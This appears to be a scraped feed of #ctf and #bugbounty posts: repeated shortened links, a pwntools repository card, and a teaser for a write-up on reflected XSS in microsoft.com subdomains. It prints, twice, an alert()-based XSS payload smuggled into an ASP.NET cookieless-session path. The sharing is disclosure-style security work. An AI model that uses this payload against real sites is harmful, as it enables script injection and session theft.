#ctf
https://t.co/VDO5Cfv3uq
https://t.co/5iF9mwjyke
https://t.co/TaLRxitwZa
https://t.co/Ei9ZTPQBmE
https://t.co/QrLjokc25O
https://t.co/brop8j5LcQ
https://t.co/rMK6Ejc9SG
https://t.co/FsKr1eKhJH
https://t.co/zWK4bDSaXK
#bugbounty
https://t.co/VDO5Cfv3uq
https://t.co/5iF9mwjyke
https://t.co/TaLRxitwZa
https://t.co/Ei9ZTPQBmE
https://t.co/QrLjokc25O
https://t.co/brop8j5LcQ
https://t.co/rMK6Ejc9SG
https://t.co/FsKr1eKhJH
https://t.co/zWK4bDSaXK
#bugbounty
GitHub
Gallopsled/pwntools
CTF framework and exploit development library. Contribute to Gallopsled/pwntools development by creating an account on GitHub.
Reflected XSS on microsoft[.]com subdomains
<script src=”<%= ResolveUrl(“~/Script.js”) %>”></script>
/(A(%22onerror='alert%601%60'testabcd))/
https://medium.com/bugbountywriteup/reflected-xss-on-microsoft-com-subdomains-4bdfc2c716df
<script src=”<%= ResolveUrl(“~/Script.js”) %>”></script>
/(A(%22onerror='alert%601%60'testabcd))/
https://medium.com/bugbountywriteup/reflected-xss-on-microsoft-com-subdomains-4bdfc2c716df
Medium
Reflected XSS on microsoft.com subdomains
Microsoft replied that this is out of scope of their security program as well as not deemed this as a security vulnerability at all, so I…